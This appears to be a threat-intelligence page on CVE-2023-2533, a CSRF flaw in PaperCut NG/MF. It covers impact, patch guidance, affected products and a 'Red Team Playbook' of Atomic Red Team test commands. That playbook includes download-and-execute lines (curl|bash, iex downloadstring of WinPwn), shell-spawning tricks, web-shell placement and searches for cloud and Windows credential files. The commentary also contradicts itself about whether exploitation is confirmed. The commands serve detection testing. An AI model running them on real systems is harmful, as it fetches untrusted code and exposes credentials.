CVE-2023-2533
Overview
This vulnerability is a Cross-Site Request Forgery (CSRF) affecting PaperCut NG/MF's administrative interface. The root cause lies in insufficient validation of state-changing requests, allowing unauthorized commands to be executed when an authenticated administrator's session is active. The flaw exploits the lack of proper anti-CSRF tokens or mechanisms in the affected web application endpoints responsible for security settings and configuration changes.
Vulnerability Description
A Cross-Site Request Forgery (CSRF) vulnerability has been identified in PaperCut NG/MF, which, under specific conditions, could potentially enable an attacker to alter security settings or execute arbitrary code. This could be exploited if the target is an admin with a current login session. Exploiting this would typically involve the possibility of deceiving an admin into clicking a specially crafted malicious link, potentially leading to unauthorized changes.
Impact
An attacker can alter security configurations or execute arbitrary code on the PaperCut NG/MF server by exploiting an active administrator session, potentially leading to full system compromise. This requires the attacker to have the administrator visit a crafted link during their authenticated session, making social engineering a necessary component. Consequences include unauthorized changes to security policies, data manipulation, and possible lateral movement within the network, impacting organizational confidentiality and integrity.
Solution
PaperCut has released a security bulletin in June 2023 addressing this vulnerability for all affected versions of PaperCut NG and MF. Administrators should apply the vendor-provided patches as detailed in the official advisory available at https://www.papercut.com/kb/Main/SecurityBulletinJune2023. The update includes proper CSRF protections on administrative endpoints. No alternative workarounds are recommended; immediate patching is advised to mitigate risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant Cross-Site Request Forgery (CSRF) vulnerability has been identified in PaperCut NG/MF, a widely used print management solution. This vulnerability arises from the application’s failure to adequately validate requests made by authenticated users, particularly administrators. In a CSRF attack, an attacker can trick an authenticated user into submitting a malicious request without their consent. This can lead to unauthorized actions being performed on behalf of the user, including altering security settings or executing arbitrary code, which poses a severe risk to the integrity and confidentiality of the system.
The primary attack vector for this vulnerability involves social engineering tactics, where an attacker crafts a malicious link designed to exploit the CSRF flaw. If an administrator, who is currently logged into the PaperCut NG/MF interface, clicks on this link, the attacker can manipulate the session to perform actions that the administrator could normally execute. For example, the attacker could change user permissions, modify print quotas, or even deploy malicious scripts within the environment. The effectiveness of this attack hinges on the administrator's current session and their trust in the source of the link, making it a potent threat in environments where administrators may be less vigilant.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely on PaperCut for managing their printing infrastructure. Unauthorized changes made by an attacker could lead to significant operational disruptions, data breaches, or even financial losses. For instance, if an attacker were to alter user permissions, they could grant themselves or other malicious users elevated privileges, potentially leading to further exploitation of the network. Additionally, the ability to execute arbitrary code could allow attackers to deploy ransomware or other malware, exacerbating the business risk and potentially leading to compliance violations, especially in regulated industries.
To detect and mitigate this vulnerability, organizations should implement several strategies. First and foremost, ensuring that the PaperCut NG/MF software is updated to the latest version is critical, as vendors typically release patches to address known vulnerabilities. Furthermore, organizations should employ security best practices such as implementing multi-factor authentication (MFA) for administrative accounts, which can help prevent unauthorized access even if an attacker successfully exploits the CSRF vulnerability. Additionally, educating users about the risks of clicking on unknown links and the importance of verifying the authenticity of requests can significantly reduce the likelihood of successful exploitation.
In conclusion, the identified CSRF vulnerability in PaperCut NG/MF represents a serious threat to organizations utilizing this print management solution. The potential for unauthorized changes and arbitrary code execution underscores the importance of proactive security measures. By adopting robust detection and mitigation strategies, organizations can protect themselves from the risks associated with this vulnerability and maintain the integrity of their printing environments. It is essential for cybersecurity professionals to remain vigilant and informed about such vulnerabilities to safeguard their organizations effectively.
Recent updates to CVE-2023-2533 have resulted in a downward revision of its CVSS score from 8.8 to 8.4, reflecting a refined understanding of the vulnerability’s impact and exploitability. This adjustment aligns with the inclusion of the vulnerability in the KEV catalog as of late July 2025, signaling increased recognition within the security community but without accompanying evidence of active exploitation or ransomware adoption. CSURFACE threat intelligence confirms that exploit activity remains stable, with no emergent proof-of-concept exploits or significant shifts in attacker behavior detected by our telemetry. The EPSS score remains moderate and stable, indicating a consistent but not escalating likelihood of exploitation in the near term. For defenders, this nuanced recalibration underscores that while the vulnerability continues to pose a high risk—particularly given its potential for unauthorized administrative changes via CSRF—the immediate threat landscape has not intensified. Consequently, the overall threat level remains serious but without signs of accelerated exploitation, allowing security teams to prioritize resources accordingly while maintaining vigilance.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Papercut | Papercut Mf | All |
cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Mf | All |
cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Mf | All |
cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Ng | All |
cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Ng | All |
cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
|
|
|
Papercut | Papercut Ng | All |
cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-2533 |
| fluidattacks.com |
GitHub CVE
|
https://fluidattacks.com/advisories/arcangel/ |
| papercut.com |
GitHub CVE
|
https://www.papercut.com/kb/Main/SecurityBulletinJune2023 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-2533 |